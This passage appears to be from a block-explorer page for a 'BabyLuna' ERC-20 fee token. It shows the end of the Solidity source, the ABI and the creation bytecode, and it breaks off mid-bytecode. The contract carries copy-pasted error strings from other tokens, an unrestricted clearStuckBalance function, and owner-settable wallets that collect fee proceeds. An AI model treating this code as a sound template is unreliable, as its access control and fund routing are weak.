if(fees > 0) { super._transfer(from, address(this), fees); } if(burnShare > 0) { super._transfer(from, deadWallet, burnShare); } amount = amount.sub(fees.add(burnShare)); } super._transfer(from, to, amount); } function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap { uint256 tokensForLiquidity = contractTokenBalance.mul(liquidityPercent).div(100); // split the Liquidity token balance into halves uint256 half = tokensForLiquidity.div(2); uint256 otherHalf = tokensForLiquidity.sub(half); // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // swap tokens for ETH swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered // how much ETH did we just swap into? uint256 newBalance = address(this).balance.sub(initialBalance); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); // swap and Send Eth to marketing, dev wallets swapTokensForEth(contractTokenBalance.sub(tokensForLiquidity)); marketingWallet.transfer(address(this).balance.mul(marketingPercent).div(marketingPercent.add(devPercent))); devWallet.transfer(address(this).balance); emit SwapAndLiquify(half, newBalance); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); if(allowance(address(this), address(uniswapV2Router)) < tokenAmount) { _approve(address(this), address(uniswapV2Router), ~uint256(0)); } // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); } function clearStuckBalance() external { uint256 amountETH = address(this).balance; payable(devWallet).transfer(amountETH); } function setMaxSellTransaction(uint256 _maxSellTxAmount) public onlyOwner { maxSellTransactionAmount = _maxSellTxAmount; require(maxSellTransactionAmount>totalSupply().div(1000), "value is too low"); } function setMaxBuyTransaction(uint256 _maxBuyTxAmount) public onlyOwner { maxBuyTransactionAmount = _maxBuyTxAmount; require(maxBuyTransactionAmount>totalSupply().div(1000), "value is too low"); } function setSwapTokensAtAmouunt(uint256 _newAmount) public onlyOwner { swapTokensAtAmount = _newAmount; } function setMarketingWallet(address payable wallet) public onlyOwner { marketingWallet = wallet; } function setDevWallet(address payable wallet) public onlyOwner { devWallet = wallet; } function updateBuyTotalTax(uint256 _buyTotalFees) public onlyOwner { buyTotalFees = _buyTotalFees; require(buyTotalFees <= 10, "Fee too high"); } function updateSellTotalTax(uint256 _sellTotalFees) public onlyOwner { sellTotalFees = _sellTotalFees; require(sellTotalFees <= 10, "Fee too high"); } function updateEarlySellTotalTax(uint256 _earlySellTotalFee) public onlyOwner { earlySellTotalFee = _earlySellTotalFee; require(earlySellTotalFee <= 20, "Fee too high"); } function updateTaxDistributionPercentage(uint256 _liquidityPercent, uint256 _marketingPercent, uint256 _devPercent) public onlyOwner { require(_liquidityPercent.add(_marketingPercent).add(_devPercent) == 100, "total percentage must be equal to 100"); liquidityPercent = _liquidityPercent; marketingPercent = _marketingPercent; devPercent = _devPercent; } function setEarlySellTax(bool onoff) external onlyOwner { enableEarlySellTax = onoff; } function setAutoBurn(uint256 _burnFee) external onlyOwner { require(_burnFee <= 5, "value too high"); burnFee = _burnFee; } function setMaxWalletToken(uint256 _maxToken) external onlyOwner { maxWalletToken = _maxToken; require(maxWalletToken>totalSupply().div(1000), "value is too low"); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"newValue","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"oldValue","type":"uint256"}],"name":"GasForProcessingUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckBalance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"earlySellTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableEarlySellTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"lastTxTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_burnFee","type":"uint256"}],"name":"setAutoBurn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"onoff","type":"bool"}],"name":"setEarlySellTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxBuyTxAmount","type":"uint256"}],"name":"setMaxBuyTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxSellTxAmount","type":"uint256"}],"name":"setMaxSellTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxToken","type":"uint256"}],"name":"setMaxWalletToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_newAmount","type":"uint256"}],"name":"setSwapTokensAtAmouunt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyTotalFees","type":"uint256"}],"name":"updateBuyTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_earlySellTotalFee","type":"uint256"}],"name":"updateEarlySellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sellTotalFees","type":"uint256"}],"name":"updateSellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_liquidityPercent","type":"uint256"},{"internalType":"uint256","name":"_marketingPercent","type":"uint256"},{"internalType":"uint256","name":"_devPercent","type":"uint256"}],"name":"updateTaxDistributionPercentage","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newAddress","type":"address"}],"name":"updateUniswapV2Router","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a06040526000196005556007805461010160a81b61ffff60a81b1990911617905569d3c21bcecceda100000060085569021e19e0c9bab2400000600955683635c9adc5dea00000600a5569054b40b1f852bda00000600b556000600c819055600d8190556014600e819055600f91909155601080546001600160a01b031990811661dead1790915560376011556019601255601382905581548116738d2b75692a68d22477d9951789a0c0cddb590d5c179091556015805490911673859de0b0c6faa49d55b3e148dba5974d4b8035bc179055348015620000e057600080fd5b5060405162002e0038038062002e008339810160408190526200010391620007f4565b604080518082018252600880825267426162794c756e6160c01b60208084018281528551808701909652928552840152815191929162000146916003916200074e565b5080516200015c9060049060208401906200074e565b5050506200017962000173620003b260201b60201c565b620003b6565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001d3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001f99190620007f4565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000247573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200026d9190620007f4565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620002bb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e19190620007f4565b600780546001600160a01b0319166001600160a01b0385811691909117909155811660805290506200031581600162000408565b620003346200032c6006546001600160a01b031690565b6001620004f8565b6014546200034d906001600160a01b03166001620004f8565b60155462000366906001600160a01b03166001620004f8565b62000373836001620004f8565b62000380306001620004f8565b620003a9620003976006546001600160a01b031690565b8469d3c21bcecceda10000006200063e565b50505062000889565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03821660009081526017602052604090205481151560ff909116151503620004a45760405162461bcd60e51b815260206004820152603e60248201527f43756c743a204175746f6d61746564206d61726b6574206d616b65722070616960448201527f7220697320616c72656164792073657420746f20746861742076616c7565000060648201526084015b60405180910390fd5b6001600160a01b038216600081815260176020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6006546001600160a01b03163314620005545760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200049b565b6001600160a01b03821660009081526016602052604090205481151560ff909116151503620005df5760405162461bcd60e51b815260206004820152603060248201527f43756c743a204163636f756e7420697320616c7265616479207468652076616c60448201526f7565206f6620276578636c756465642760801b60648201526084016200049b565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038316620006965760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200049b565b8060026000828254620006aa919062000826565b90915550506001600160a01b03831660009081526020819052604081208054839290620006d990849062000826565b90915550506005546001600160a01b038381166000908152602081815260408083209490945592518481529186169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000749600084836001600160e01b038416565b505050565b8280546200075c906200084d565b90600052602060002090601f016020900481019282620007805760008555620007cb565b82601f106200079b57805160ff1916838001178555620007cb565b82800160010185558215620007cb579182015b82811115620007cb578251825591602001919060010190620007ae565b50620007d9929150620007dd565b5090565b5b80821115620007d95760008155600101620007de565b6000602082840312156200080757600080fd5b81516001600160a01b03811681146200081f57600080fd5b9392505050565b600082198211156200084857634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200086257607f821691505b6020821081036200088357634e487b7160e01b600052602260045260246000fd5b50919050565b608051612554620008ac600039600081816104c40152610f9701526125546000f3fe6080604052600436106102e85760003560e01c8063750c11b611610190578063b2f5260a116100dc578063dd62ed3e11610095578063e6c75f711161006f578063e6c75f7114610923578063f2fde38b14610939578063fc3c28af14610959578063fce589d81461096f57600080fd5b8063dd62ed3e146108a7578063e2f45605146108ed578063e5c4005c1461090357600080fd5b8063b2f5260a146107e1578063b3b5e04314610801578063b62496f514610821578063c024666814610851578063c49b9a8014610871578063d8020a181461089157600080fd5b806395d89b4111610149578063a457c2d711610123578063a457c2d71461076a578063a4d15b641461078a578063a9059cbb146107ab578063b0683755146107cb57600080fd5b806395d89b41146107155780639a7a23d61461072a578063a26577781461074a57600080fd5b8063750c11b61461065757806375f0a8741461067757806385141a77146106975780638da5cb5b146106b75780638ea5220f146106d557806391d55f41146106f557600080fd5b80634551bbe91161024f5780635c38ffe21161020857806365b8dbc0116101e257806365b8dbc0146105d65780636a486a8e146105f657806370a082311461060c578063715018a61461064257600080fd5b80635c38ffe2146105765780635d098b38146105965780636078a9b5146105b657600080fd5b80634551bbe91461048557806349bd5a5e146104b25780634a74bb02146104e65780634fbee19314610507578063533f9630146105405780635aa821a91461056057600080fd5b80631aa04b88116102a15780631aa04b88146103de5780631f53ac02146103f457806323b872dd14610414578063313ce56714610434578063364333f414610450578063395093511461046557600080fd5b806302259e9e146102f457806306fdde031461031d578063095ea7b31461033f5780630db722c41461036f5780631694505e1461039157806318160ddd146103c957600080fd5b366102ef57005b600080fd5b34801561030057600080fd5b5061030a60085481565b6040519081526020015b60405180910390f35b34801561032957600080fd5b50610332610985565b60405161031491906120a8565b34801561034b57600080fd5b5061035f61035a366004612112565b610a17565b6040519015158152602001610314565b34801561037b57600080fd5b5061038f61038a36600461213e565b610a2d565b005b34801561039d57600080fd5b506007546103b1906001600160a01b031681565b6040516001600160a01b039091168152602001610314565b3480156103d557600080fd5b5060025461030a565b3480156103ea57600080fd5b5061030a600e5481565b34801561040057600080fd5b5061038f61040f36600461216a565b610adf565b34801561042057600080fd5b5061035f61042f366004612187565b610b2b565b34801561044057600080fd5b5060405160128152602001610314565b34801561045c57600080fd5b5061038f610bd5565b34801561047157600080fd5b5061035f610480366004612112565b610c13565b34801561049157600080fd5b5061030a6104a036600461216a565b60186020526000908152604090205481565b3480156104be57600080fd5b506103b17f000000000000000000000000000000000000000000000000000000000000000081565b3480156104f257600080fd5b5060075461035f90600160a81b900460ff1681565b34801561051357600080fd5b5061035f61052236600461216a565b6001600160a01b031660009081526016602052604090205460ff1690565b34801561054c57600080fd5b5061038f61055b3660046121c8565b610c4f565b34801561056c57600080fd5b5061030a60095481565b34801561058257600080fd5b5061038f6105913660046121c8565b610ca2565b3480156105a257600080fd5b5061038f6105b136600461216a565b610d06565b3480156105c257600080fd5b5061038f6105d13660046121c8565b610d52565b3480156105e257600080fd5b5061038f6105f136600461216a565b610da2565b34801561060257600080fd5b5061030a600d5481565b34801561061857600080fd5b5061030a61062736600461216a565b6001600160a01b031660009081526020819052604090205490565b34801561064e57600080fd5b5061038f610e99565b34801561066357600080fd5b5061038f6106723660046121c8565b610ecf565b34801561068357600080fd5b506014546103b1906001600160a01b031681565b3480156106a357600080fd5b506010546103b1906001600160a01b031681565b3480156106c357600080fd5b506006546001600160a01b03166103b1565b3480156106e157600080fd5b506015546103b1906001600160a01b031681565b34801561070157600080fd5b5061038f6107103660046121c8565b610efe565b34801561072157600080fd5b50610332610f5c565b34801561073657600080fd5b5061038f6107453660046121f6565b610f6b565b34801561075657600080fd5b5061038f61076536600461222b565b61105a565b34801561077657600080fd5b5061035f610785366004612112565b6110a2565b34801561079657600080fd5b5060075461035f90600160b01b900460ff1681565b3480156107b757600080fd5b5061035f6107c6366004612112565b61113b565b3480156107d757600080fd5b5061030a60115481565b3480156107ed57600080fd5b5061038f6107fc3660046121c8565b611148565b34801561080d57600080fd5b5061038f61081c3660046121c8565b611198565b34801561082d57600080fd5b5061035f61083c36600461216a565b60176020526000908152604090205460ff1681565b34801561085d57600080fd5b5061038f61086c3660046121f6565b6111f6565b34801561087d57600080fd5b5061038f61088c36600461222b565b611308565b34801561089d57600080fd5b5061030a60125481565b3480156108b357600080fd5b5061030a6108c2366004612246565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156108f957600080fd5b5061030a600a5481565b34801561090f57600080fd5b5061038f61091e3660046121c8565b61138a565b34801561092f57600080fd5b5061030a600b5481565b34801561094557600080fd5b5061038f61095436600461216a565b6113fb565b34801561096557600080fd5b5061030a60135481565b34801561097b57600080fd5b5061030a600f5481565b6060600380546109949061227f565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061227f565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b6000610a24338484611493565b50600192915050565b6006546001600160a01b03163314610a605760405162461bcd60e51b8152600401610a57906122b9565b60405180910390fd5b610a7481610a6e85856115b7565b906115b7565b606414610ad15760405162461bcd60e51b815260206004820152602560248201527f746f74616c2070657263656e74616765206d75737420626520657175616c207460448201526406f203130360dc1b6064820152608401610a57565b601192909255601255601355565b6006546001600160a01b03163314610b095760405162461bcd60e51b8152600401610a57906122b9565b601580546001600160a01b0319166001600160a01b0392909216919091179055565b6000610b388484846115ca565b6001600160a01b038416600090815260016020908152604080832033845290915290205482811015610bbd5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b6064820152608401610a57565b610bca8533858403611493565b506001949350505050565b60155460405147916001600160a01b03169082156108fc029083906000818181858888f19350505050158015610c0f573d6000803e3d6000fd5b5050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610a24918590610c4a908690612304565b611493565b6006546001600160a01b03163314610c795760405162461bcd60e51b8152600401610a57906122b9565b600c819055600a811115610c9f5760405162461bcd60e51b8152600401610a579061231c565b50565b6006546001600160a01b03163314610ccc5760405162461bcd60e51b8152600401610a57906122b9565b6008819055610ce66103e8610ce060025490565b90611a48565b60085411610c9f5760405162461bcd60e51b8152600401610a5790612342565b6006546001600160a01b03163314610d305760405162461bcd60e51b8152600401610a57906122b9565b601480546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b03163314610d7c5760405162461bcd60e51b8152600401610a57906122b9565b600e8190556014811115610c9f5760405162461bcd60e51b8152600401610a579061231c565b6006546001600160a01b03163314610dcc5760405162461bcd60e51b8152600401610a57906122b9565b6007546001600160a01b0390811690821603610e3c5760405162461bcd60e51b815260206004820152602960248201527f43756c743a2054686520726f7574657220616c7265616479206861732074686160448201526874206164647265737360b81b6064820152608401610a57565b6007546040516001600160a01b03918216918316907f8fc842bbd331dfa973645f4ed48b11683d501ebf1352708d77a5da2ab49a576e90600090a3600780546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b03163314610ec35760405162461bcd60e51b8152600401610a57906122b9565b610ecd6000611a54565b565b6006546001600160a01b03163314610ef95760405162461bcd60e51b8152600401610a57906122b9565b600a55565b6006546001600160a01b03163314610f285760405162461bcd60e51b8152600401610a57906122b9565b600b819055610f3c6103e8610ce060025490565b600b5411610c9f5760405162461bcd60e51b8152600401610a5790612342565b6060600480546109949061227f565b6006546001600160a01b03163314610f955760405162461bcd60e51b8152600401610a57906122b9565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b0316036110505760405162461bcd60e51b815260206004820152604b60248201527f43756c743a205468652050616e63616b655377617020706169722063616e6e6f60448201527f742062652072656d6f7665642066726f6d206175746f6d617465644d61726b6560648201526a744d616b6572506169727360a81b608482015260a401610a57565b610c0f8282611aa6565b6006546001600160a01b031633146110845760405162461bcd60e51b8152600401610a57906122b9565b60078054911515600160b01b0260ff60b01b19909216919091179055565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156111245760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610a57565b6111313385858403611493565b5060019392505050565b6000610a243384846115ca565b6006546001600160a01b031633146111725760405162461bcd60e51b8152600401610a57906122b9565b600d819055600a811115610c9f5760405162461bcd60e51b8152600401610a579061231c565b6006546001600160a01b031633146111c25760405162461bcd60e51b8152600401610a57906122b9565b60098190556111d66103e8610ce060025490565b60095411610c9f5760405162461bcd60e51b8152600401610a5790612342565b6006546001600160a01b031633146112205760405162461bcd60e51b8152600401610a57906122b9565b6001600160a01b03821660009081526016602052604090205481151560ff9091161515036112a95760405162461bcd60e51b815260206004820152603060248201527f43756c743a204163636f756e7420697320616c7265616479207468652076616c60448201526f7565206f6620276578636c756465642760801b6064820152608401610a57565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6006546001600160a01b031633146113325760405162461bcd60e51b8152600401610a57906122b9565b60078054821515600160a81b0260ff60a81b199091161790556040517f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc1599061137f90831515815260200190565b60405180910390a150565b6006546001600160a01b031633146113b45760405162461bcd60e51b8152600401610a57906122b9565b60058111156113f65760405162461bcd60e51b815260206004820152600e60248201526d0ecc2d8eaca40e8dede40d0d2ced60931b6044820152606401610a57565b600f55565b6006546001600160a01b031633146114255760405162461bcd60e51b8152600401610a57906122b9565b6001600160a01b03811661148a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610a57565b610c9f81611a54565b6001600160a01b0383166114f55760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610a57565b6001600160a01b0382166115565760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610a57565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006115c38284612304565b9392505050565b6001600160a01b0383166115f05760405162461bcd60e51b8152600401610a579061236c565b6001600160a01b0382166116165760405162461bcd60e51b8152600401610a57906123b1565b8060000361162f5761162a83836000611b90565b505050565b6001600160a01b03831660009081526017602052604090205460ff16801561167057506001600160a01b03831660009081526016602052604090205460ff16155b801561169557506001600160a01b03821660009081526016602052604090205460ff16155b1561179d576009548111156117005760405162461bcd60e51b815260206004820152602b60248201527f616d6f756e74206578636565647320746865206d61784275795472616e73616360448201526a3a34b7b720b6b7bab73a1760a91b6064820152608401610a57565b6001600160a01b038216600090815260208190526040902054600b546117268383612304565b11156117805760405162461bcd60e51b8152602060048201526024808201527f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f6044820152633ab73a1760e11b6064820152608401610a57565b506001600160a01b03821660009081526018602052604090204290555b6001600160a01b03821660009081526017602052604090205460ff1680156117de57506001600160a01b03831660009081526016602052604090205460ff16155b801561180357506001600160a01b03821660009081526016602052604090205460ff16155b1561186f5760085481111561186f5760405162461bcd60e51b815260206004820152602c60248201527f616d6f756e74206578636565647320746865206d617853656c6c5472616e736160448201526b31ba34b7b720b6b7bab73a1760a11b6064820152608401610a57565b30600090815260208190526040902054600a548110801590819061189d5750600754600160a01b900460ff16155b80156118c157506001600160a01b03841660009081526017602052604090205460ff165b80156118d65750600754600160a81b900460ff165b156118e957600a5491506118e982611ce5565b6001600160a01b038516600090815260166020526040812054819060ff1615801561192d57506001600160a01b03861660009081526016602052604090205460ff16155b15611a3457600c546001600160a01b03871660009081526017602052604090205460ff16156119c0576001600160a01b03881660009081526018602052604081205461197990426123f4565b600754909150600160b01b900460ff1680156119985750620151808111155b156119a757600e5491506119be565b600754600160b01b900460ff166119be57600d5491505b505b6119cf6064610ce08884611e48565b92506119eb6064610ce0600f5489611e4890919063ffffffff16565b915082156119fe576119fe883085611b90565b8115611a1c57601054611a1c9089906001600160a01b031684611b90565b611a30611a2984846115b7565b8790611e54565b9550505b611a3f878787611b90565b50505050505050565b60006115c3828461240b565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03821660009081526017602052604090205481151560ff909116151503611b3c5760405162461bcd60e51b815260206004820152603e60248201527f43756c743a204175746f6d61746564206d61726b6574206d616b65722070616960448201527f7220697320616c72656164792073657420746f2074686174207661